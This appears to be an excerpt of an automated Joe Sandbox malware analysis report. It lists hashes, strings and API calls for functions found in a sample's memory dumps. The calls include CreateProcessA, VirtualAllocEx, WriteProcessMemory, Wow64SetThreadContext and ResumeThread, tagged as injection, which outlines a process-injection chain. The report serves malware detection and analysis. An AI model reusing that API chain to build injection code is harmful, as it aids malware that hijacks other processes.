Opcode ID: 7155184e0a93057dce3cf54efe95ec8658bc4d1cd3428647884b1f7d16aa4cfd
Instruction ID: 5b9ccb4bedb582e8b1ba76d3c7ebe43431c380c03f6ca3b5920b440dd9b2e10e
Opcode Fuzzy Hash: 7155184e0a93057dce3cf54efe95ec8658bc4d1cd3428647884b1f7d16aa4cfd
Instruction Fuzzy Hash: EED2C5B4A0020ACFDB01CF58D589FEEBBB1FB49314F1552A4DA046B326D775A989CF90

Function 05B63E50 Relevance: 6.0, Strings: 4, Instructions: 1017
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z<.B, xrefs: 05B64E63
[LGB, xrefs: 05B642C8
H5B, xrefs: 05B6425F
F@, xrefs: 05B64165

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: Z<.B$[LGB$F@$H5B
API String ID: 0-4264506516
Opcode ID: 6b294f3c6ec566d8e8a23b6841691b2089a21480b399b41bb79633acc3d74580
Instruction ID: a200e6cd14c67ccfabfd057bea65f137830e36dce3e7df2c4a62fcbff9af7ca7
Opcode Fuzzy Hash: 6b294f3c6ec566d8e8a23b6841691b2089a21480b399b41bb79633acc3d74580
Instruction Fuzzy Hash: 7AD2C5B4A0020ACFDB01CF58D589FEEBBB1FB49314F1552A4DA046B326D775A989CF90

Function 05B61927 Relevance: 5.2, Strings: 4, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 05B61CF3
D, xrefs: 05B61DAE
2, xrefs: 05B61D40
P, xrefs: 05B61D52

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: 2$D$P$s
API String ID: 0-3906340181
Opcode ID: 6193097c03d6b81c0679a6f0a0bc87692e7477ecbf123e61a106da5e5e9ced5c
Instruction ID: 3c742c7331750481e020b3685b26032f86bf2e5f35f8f900e6cd9acc3c378f2e
Opcode Fuzzy Hash: 6193097c03d6b81c0679a6f0a0bc87692e7477ecbf123e61a106da5e5e9ced5c
Instruction Fuzzy Hash: EFC1A1B4E052288FDB64EF28C954B9ABBB2FF89300F1081E9D54DA7250DB365ED58F41

Function 0313EAA0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0313ED67

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 20be9453cd3cbb4d96bee46deb3ec6ea050a0b64ba96f582bc718e27b5fc2470
Instruction ID: 03ac7cb32def246b3115be115e68a0241356843d09973d882b17f76e107b5e66
Opcode Fuzzy Hash: 20be9453cd3cbb4d96bee46deb3ec6ea050a0b64ba96f582bc718e27b5fc2470
Instruction Fuzzy Hash: 84C12771D0026D8FDB20CFA8C840BEEBBB1BF49314F0495A9E849B7254DB749A85CF95

Function 0605F9E0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0605FAB3

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fafc230f4bb998eade02264b1fefb86aeef934641b769ea88849870a1be1cebc
Instruction ID: 16126116be80427e3be69f27e84a3f1c5c94d0755748cf85c0041b29ec15c39e
Opcode Fuzzy Hash: fafc230f4bb998eade02264b1fefb86aeef934641b769ea88849870a1be1cebc
Instruction Fuzzy Hash: 6D41AAB5D012599FCF00CFA9D984ADEFBF1BB49310F24902AE818B7210D739AA45CF64

Function 0605D2C0 Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 0605D3C9

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6758c0d637a1911777c6935fe992cf94238e4da28ee4a1f8aeeedff4176c7f0
Instruction ID: 6215dde19db7359114bdb393e0813129ee5fca2c6252fa2230b1f34e2dc78e24
Opcode Fuzzy Hash: f6758c0d637a1911777c6935fe992cf94238e4da28ee4a1f8aeeedff4176c7f0
Instruction Fuzzy Hash: A541EEB4D002589FDB54CFA9D884B9EBBF1BF49304F10912AE814AB394D774A885CF99

Function 0605F888 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0605F932

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9893be279aa8dceeb806376271234821c105c89655821fa630533d4722062c3f
Instruction ID: 1ef30bfc8e4abc79d0f2d15a16cf7ccd19121f9a74880cf83b42a2594cf84f9f
Opcode Fuzzy Hash: 9893be279aa8dceeb806376271234821c105c89655821fa630533d4722062c3f
Instruction Fuzzy Hash: 103188B9D042589FCF10CFA9D984ADEFBB5FB49310F10942AE815B7210D735A946CF98

Function 0605F280 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0605F32F

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e571b2751569124c311c6d63aeff0403cba15476c7df1e0ca459ea31d0f07b47
Instruction ID: b219ab94fce9495fd3366ee9c816397bb980547ccc8ad5c3b7c216c659ccf750
Opcode Fuzzy Hash: e571b2751569124c311c6d63aeff0403cba15476c7df1e0ca459ea31d0f07b47
Instruction Fuzzy Hash: 3331BCB4D012589FDB10CFA9D884AEEFFF0BB49310F24802AE815B7240C738A985CF94

Function 0605CFE8 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0605D08F

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5380e832fd721be304797762a9b6649f9e348190543d986c568bc00124def507
Instruction ID: 6484bcfe7238fbc3fb9bdeb38c871eb6f26364c9118883c52315a216dbe13864
Opcode Fuzzy Hash: 5380e832fd721be304797762a9b6649f9e348190543d986c568bc00124def507
Instruction Fuzzy Hash: CC317AB9D012589FCB10CFA9D580ADEFBB4BF19310F14A02AE814B7310D375A945CF58

Function 0605F158 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0605F1D6

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d225e562f663224dfb0bfd134dc7d9fbc6c67aa3412674c4ea9ef137bff14eef
Instruction ID: 804ad0877eb65fad87528a21d073d9063ef06801def8072733b088b9a68cb7ef
Opcode Fuzzy Hash: d225e562f663224dfb0bfd134dc7d9fbc6c67aa3412674c4ea9ef137bff14eef
Instruction Fuzzy Hash: 8531AAB4D012599FCB14CFA9D984ADEFBB4AB49320F14942AE819B7310C735A945CF98

Function 0605E388 Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0605E429

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5087498f5a3f4001b48ff60053303c5ecf47baf608bc7816e8f0ebd00580446d
Instruction ID: ea6c4637a52e671f7ddfe154a7903bb6c419f03108cbea886579a7cc3931f2bd
Opcode Fuzzy Hash: 5087498f5a3f4001b48ff60053303c5ecf47baf608bc7816e8f0ebd00580446d
Instruction Fuzzy Hash: E63177B8D00258DFCF10CFA9D984A9EFBB5BB09310F10902AE854B7310D335A945CF69

Function 05B65419 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae45f5b2d46a1a118537b10e33a9742ea2add4dd405df1a0f6e265f228949bda
Instruction ID: 79ce5ada9985a27126d678f7a524f12a81a3afc8e5b1e872e0b72d56ee31d354
Opcode Fuzzy Hash: ae45f5b2d46a1a118537b10e33a9742ea2add4dd405df1a0f6e265f228949bda
Instruction Fuzzy Hash: E0419175E002199FCB44DFA9D984ADEBBF2FF89300F10806AE915AB364DB35A901CF50

Function 05B65428 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb5532edabb966333da89345a7a9c5365ccb306e01f475cede7e3605ea09045
Instruction ID: be9f4e5a828a198295f69b19711e4864575fd7d21abc14e4da040b83d1b262c7
Opcode Fuzzy Hash: 4fb5532edabb966333da89345a7a9c5365ccb306e01f475cede7e3605ea09045
Instruction Fuzzy Hash: 4A416E74E012199FCB44DFA9D984ADEBBF2FF89310F10816AE915AB364DB35A901CF50

Function 0180D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669073685.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180d000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1775328ec361488b760e820c3389687ef6c3f2d1c26c898d4261082098dcdb
Instruction ID: 06105882fe6bc08cf2dfbb58ad8cfd1166b4184b07ef4aedc2384ee933fe0248
Opcode Fuzzy Hash: 0a1775328ec361488b760e820c3389687ef6c3f2d1c26c898d4261082098dcdb
Instruction Fuzzy Hash: 1B214571104208DFDB52DF88DDC4B26BF65FB84314F20C669E9098B282C336C506CAA2

Function 0180D017 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669073685.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180d000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 7ed4cf081cae5d3048747eef90955f749f83c03214e1c1d7a01ecb5d588f2af3
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: 7811E276504284CFDB12CF54D9C4B16BF72FB84324F24C6AADD094B696C33AD51ACBA2

Function 05B6B388 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c42bc3092407cd6026b114aa719f31f614e377e021a58fa893920dbcc5f880
Instruction ID: 2e6d8702547684963815e5b00bab60911af4b5a789ccf3a22c1e812070932ed7
Opcode Fuzzy Hash: d8c42bc3092407cd6026b114aa719f31f614e377e021a58fa893920dbcc5f880
Instruction Fuzzy Hash: 31D022212A010183C310B694E80E3A07EE89301211F680120F80CD2981CE78E88182D2

Function 05B6B398 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a1b7b258dcd7b854f6b2e0a8f20188354541b32a3e7fd2c872255f33a6434bf
Instruction ID: ca250d3f058f389915dad01aa03c95f2ccca558f20d63e37881e210947cca1f2
Opcode Fuzzy Hash: 7a1b7b258dcd7b854f6b2e0a8f20188354541b32a3e7fd2c872255f33a6434bf
Instruction Fuzzy Hash: B6B09270266608C6C318BAD8B40E3A4BFA8A741226F641162B90DA29518EB67690C6A6

Non-executed Functions

Function 05B677D0 Relevance: 84.5, Strings: 67, Instructions: 784COMMON

Download Yara Rule

Strings

*, xrefs: 05B67DEF
P, xrefs: 05B68005
%, xrefs: 05B68298
;, xrefs: 05B681AF
G, xrefs: 05B680F9
U, xrefs: 05B67C44
J, xrefs: 05B682FA
9, xrefs: 05B682F0
1, xrefs: 05B67E26
b, xrefs: 05B68440
N, xrefs: 05B67BCC
T, xrefs: 05B685C2
], xrefs: 05B682E6
2, xrefs: 05B68522
`, xrefs: 05B67970
Y, xrefs: 05B68638
T, xrefs: 05B67994
A, xrefs: 05B681B9
Q, xrefs: 05B68618
2, xrefs: 05B67FBB
@, xrefs: 05B67B50
=, xrefs: 05B68589
[, xrefs: 05B68338
MA, xrefs: 05B67D73
M, xrefs: 05B67E14
[, xrefs: 05B684F2
#A, xrefs: 05B68114
6, xrefs: 05B684DC
2, xrefs: 05B67FB1
a, xrefs: 05B67A5F
`, xrefs: 05B67F43
W, xrefs: 05B67A01
/, xrefs: 05B68558
$, xrefs: 05B67911
a, xrefs: 05B67F61
X, xrefs: 05B67A0B
X, xrefs: 05B67F0E
H, xrefs: 05B67CC2
8, xrefs: 05B68061
$, xrefs: 05B68388
L, xrefs: 05B681C3
^, xrefs: 05B67B28
@, xrefs: 05B67E87
5, xrefs: 05B679D6
H, xrefs: 05B68261
W, xrefs: 05B682C6
S, xrefs: 05B67E91
\, xrefs: 05B67E0A
), xrefs: 05B68376
', xrefs: 05B67CEC
T, xrefs: 05B685F4
$, xrefs: 05B67EB0
?, xrefs: 05B67B46
rL2@, xrefs: 05B67C82
/, xrefs: 05B68075
!, xrefs: 05B685E0
I, xrefs: 05B68154
", xrefs: 05B6806B
^, xrefs: 05B67C4E
#, xrefs: 05B685D6
J, xrefs: 05B6791B
9, xrefs: 05B68392
L, xrefs: 05B67BF8
@x(B, xrefs: 05B68130
/, xrefs: 05B685EA
2, xrefs: 05B68057
#, xrefs: 05B68451

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: f76d40e7909b49f0af6d852da1ff775e7c15d27495726ca39d36fb8ed4c52443
Instruction ID: 9a75fb0fd31db3744ec6428c46011986e3e701e17a23ba4f939a5f67718a9c21
Opcode Fuzzy Hash: f76d40e7909b49f0af6d852da1ff775e7c15d27495726ca39d36fb8ed4c52443
Instruction Fuzzy Hash: 8AA28FB0D41A298FEB64DF29CD4579ABBB6FB48305F0091EAD41CA7250EB795E85CF00

Function 05B677E0 Relevance: 84.5, Strings: 67, Instructions: 782COMMON

Download Yara Rule

Strings

*, xrefs: 05B67DEF
P, xrefs: 05B68005
%, xrefs: 05B68298
;, xrefs: 05B681AF
G, xrefs: 05B680F9
U, xrefs: 05B67C44
J, xrefs: 05B682FA
9, xrefs: 05B682F0
1, xrefs: 05B67E26
b, xrefs: 05B68440
N, xrefs: 05B67BCC
T, xrefs: 05B685C2
], xrefs: 05B682E6
2, xrefs: 05B68522
`, xrefs: 05B67970
Y, xrefs: 05B68638
T, xrefs: 05B67994
A, xrefs: 05B681B9
Q, xrefs: 05B68618
2, xrefs: 05B67FBB
@, xrefs: 05B67B50
=, xrefs: 05B68589
[, xrefs: 05B68338
MA, xrefs: 05B67D73
M, xrefs: 05B67E14
[, xrefs: 05B684F2
#A, xrefs: 05B68114
6, xrefs: 05B684DC
2, xrefs: 05B67FB1
a, xrefs: 05B67A5F
`, xrefs: 05B67F43
W, xrefs: 05B67A01
/, xrefs: 05B68558
$, xrefs: 05B67911
a, xrefs: 05B67F61
X, xrefs: 05B67A0B
X, xrefs: 05B67F0E
H, xrefs: 05B67CC2
8, xrefs: 05B68061
$, xrefs: 05B68388
L, xrefs: 05B681C3
^, xrefs: 05B67B28
@, xrefs: 05B67E87
5, xrefs: 05B679D6
H, xrefs: 05B68261
W, xrefs: 05B682C6
S, xrefs: 05B67E91
\, xrefs: 05B67E0A
), xrefs: 05B68376
', xrefs: 05B67CEC
T, xrefs: 05B685F4
$, xrefs: 05B67EB0
?, xrefs: 05B67B46
rL2@, xrefs: 05B67C82
/, xrefs: 05B68075
!, xrefs: 05B685E0
I, xrefs: 05B68154
", xrefs: 05B6806B
^, xrefs: 05B67C4E
#, xrefs: 05B685D6
J, xrefs: 05B6791B
9, xrefs: 05B68392
L, xrefs: 05B67BF8
@x(B, xrefs: 05B68130
/, xrefs: 05B685EA
2, xrefs: 05B68057
#, xrefs: 05B68451

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: db73bb83bb9c2a53d1dbf6d547885cb1f605439eed3ba8092c85b08124294152
Instruction ID: 4ccd14e9317d3ff52c990207e1c2aa4cb12d9dac98ffd567247e9d6a3c670235
Opcode Fuzzy Hash: db73bb83bb9c2a53d1dbf6d547885cb1f605439eed3ba8092c85b08124294152
Instruction Fuzzy Hash: E5A28FB0D41A298FEB64DF29CD457AABBB6FB48305F0091E9D41CA7250EB795E85CF00

Function 05B68A68 Relevance: 84.5, Strings: 67, Instructions: 771COMMON

Download Yara Rule

Strings

?, xrefs: 05B68E3D
/, xrefs: 05B6985E
[, xrefs: 05B69638
2, xrefs: 05B692B5
#, xrefs: 05B698DC
2, xrefs: 05B69354
2, xrefs: 05B69828
=, xrefs: 05B6988F
`, xrefs: 05B68C73
T, xrefs: 05B698FA
Y, xrefs: 05B6993B
!, xrefs: 05B698E6
H, xrefs: 05B68FB9
T, xrefs: 05B68C97
$, xrefs: 05B68C11
L, xrefs: 05B68EEC
$, xrefs: 05B691B0
MA, xrefs: 05B6906A
*, xrefs: 05B690E3
H, xrefs: 05B69564
/, xrefs: 05B698F0
#A, xrefs: 05B69414
\, xrefs: 05B69101
;, xrefs: 05B694AF
U, xrefs: 05B68F3E
G, xrefs: 05B693F6
2, xrefs: 05B692AB
9, xrefs: 05B695F0
', xrefs: 05B68FE0
X, xrefs: 05B68D0B
`, xrefs: 05B69246
J, xrefs: 05B695FA
a, xrefs: 05B68D5C
6, xrefs: 05B697E2
], xrefs: 05B695E6
5, xrefs: 05B68CD6
^, xrefs: 05B68E22
M, xrefs: 05B6910B
L, xrefs: 05B694C3
N, xrefs: 05B68EC0
rL2@, xrefs: 05B68F79
$, xrefs: 05B69688
b, xrefs: 05B69743
8, xrefs: 05B6935E
W, xrefs: 05B695C6
%, xrefs: 05B69598
T, xrefs: 05B698CB
S, xrefs: 05B6918E
A, xrefs: 05B694B9
/, xrefs: 05B69372
J, xrefs: 05B68C1B
9, xrefs: 05B69692
#, xrefs: 05B69757
@, xrefs: 05B68E47
), xrefs: 05B69676
I, xrefs: 05B6945A
@x(B, xrefs: 05B69436
^, xrefs: 05B68F48
X, xrefs: 05B6920E
P, xrefs: 05B69302
W, xrefs: 05B68D01
1, xrefs: 05B6911A
Q, xrefs: 05B6991B
@, xrefs: 05B69184
[, xrefs: 05B697F8
a, xrefs: 05B69264
", xrefs: 05B69368

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: a7a3e94eae6404edb53bc4a70fc08d3450246d70ee642fce16c83faaa21c639d
Instruction ID: d995a148f05568e8f447a7b9203811c677f12863dbd11e0a8c97c0121d609ad3
Opcode Fuzzy Hash: a7a3e94eae6404edb53bc4a70fc08d3450246d70ee642fce16c83faaa21c639d
Instruction Fuzzy Hash: D9A29FB0D41A298FEB64CF1ACD4479ABBF6FF88305F1091E9950CA7250EB795E858F04

Function 05B68A78 Relevance: 84.5, Strings: 67, Instructions: 769COMMON

Download Yara Rule

Strings

?, xrefs: 05B68E3D
/, xrefs: 05B6985E
[, xrefs: 05B69638
2, xrefs: 05B692B5
#, xrefs: 05B698DC
2, xrefs: 05B69354
2, xrefs: 05B69828
=, xrefs: 05B6988F
`, xrefs: 05B68C73
T, xrefs: 05B698FA
Y, xrefs: 05B6993B
!, xrefs: 05B698E6
H, xrefs: 05B68FB9
T, xrefs: 05B68C97
$, xrefs: 05B68C11
L, xrefs: 05B68EEC
$, xrefs: 05B691B0
MA, xrefs: 05B6906A
*, xrefs: 05B690E3
H, xrefs: 05B69564
/, xrefs: 05B698F0
#A, xrefs: 05B69414
\, xrefs: 05B69101
;, xrefs: 05B694AF
U, xrefs: 05B68F3E
G, xrefs: 05B693F6
2, xrefs: 05B692AB
9, xrefs: 05B695F0
', xrefs: 05B68FE0
X, xrefs: 05B68D0B
`, xrefs: 05B69246
J, xrefs: 05B695FA
a, xrefs: 05B68D5C
6, xrefs: 05B697E2
], xrefs: 05B695E6
5, xrefs: 05B68CD6
^, xrefs: 05B68E22
M, xrefs: 05B6910B
L, xrefs: 05B694C3
N, xrefs: 05B68EC0
rL2@, xrefs: 05B68F79
$, xrefs: 05B69688
b, xrefs: 05B69743
8, xrefs: 05B6935E
W, xrefs: 05B695C6
%, xrefs: 05B69598
T, xrefs: 05B698CB
S, xrefs: 05B6918E
A, xrefs: 05B694B9
/, xrefs: 05B69372
J, xrefs: 05B68C1B
9, xrefs: 05B69692
#, xrefs: 05B69757
@, xrefs: 05B68E47
), xrefs: 05B69676
I, xrefs: 05B6945A
@x(B, xrefs: 05B69436
^, xrefs: 05B68F48
X, xrefs: 05B6920E
P, xrefs: 05B69302
W, xrefs: 05B68D01
1, xrefs: 05B6911A
Q, xrefs: 05B6991B
@, xrefs: 05B69184
[, xrefs: 05B697F8
a, xrefs: 05B69264
", xrefs: 05B69368

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 874da6345aa3df90d578fc0e5b476d753805c79b2f1994b807c920ca5a7c4ad8
Instruction ID: 0bd573f4db350c1008fe7b7b58f792d8a8caad88c959fbfe0233569136a3a1a0
Opcode Fuzzy Hash: 874da6345aa3df90d578fc0e5b476d753805c79b2f1994b807c920ca5a7c4ad8
Instruction Fuzzy Hash: 07A29FB0D41A298FEB64CF1ACD4479ABBF6FB88305F1091E9950CA7350EB795E858F04

Function 0313AF2A Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

sN2, xrefs: 0313AF52
2=@, xrefs: 0313AF4B

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: 2=@$sN2
API String ID: 0-1808423570
Opcode ID: 153d19d673eb88ed4d5a3f7f7027cf01c92b6fdf4e05dd8ce2c6ab45fbde9435
Instruction ID: 320ba9281052f67986d12af6a51813b8f1d82872695b645190558d9ba22c8063
Opcode Fuzzy Hash: 153d19d673eb88ed4d5a3f7f7027cf01c92b6fdf4e05dd8ce2c6ab45fbde9435
Instruction Fuzzy Hash: 20919FB4D04A299BDBA4DF69CC8478CBBF1BF48355F4581E5D18CA2205EB306A99CF05

Function 0313878B Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4b3b533defd6449d5bff2b76c56d974373877896b031d1987e2df1fe7c7e6c
Instruction ID: 4adfeab6fa3599ebaa4940b4cff73d3ef92778a04886dc037a4d4e62156cbfc4
Opcode Fuzzy Hash: cd4b3b533defd6449d5bff2b76c56d974373877896b031d1987e2df1fe7c7e6c
Instruction Fuzzy Hash: 25617B70A042098FDB05EF79E9D079EBBF6FB89304F04852AD005AB368DB395809CF40

Function 05B6B3B8 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c284a996ff33499b61341aef9f7cf36161e5f875d44c07ad69d08f38061f19
Instruction ID: a114adfcfb2ac4f26a40ea4df559c300ea57e2057904039d28ea2a13c73ccab9
Opcode Fuzzy Hash: 51c284a996ff33499b61341aef9f7cf36161e5f875d44c07ad69d08f38061f19
Instruction Fuzzy Hash: B8613B70A142098FDB44DF79E9816AABFF6FB88300F149469D418DB369DF756C09CB81

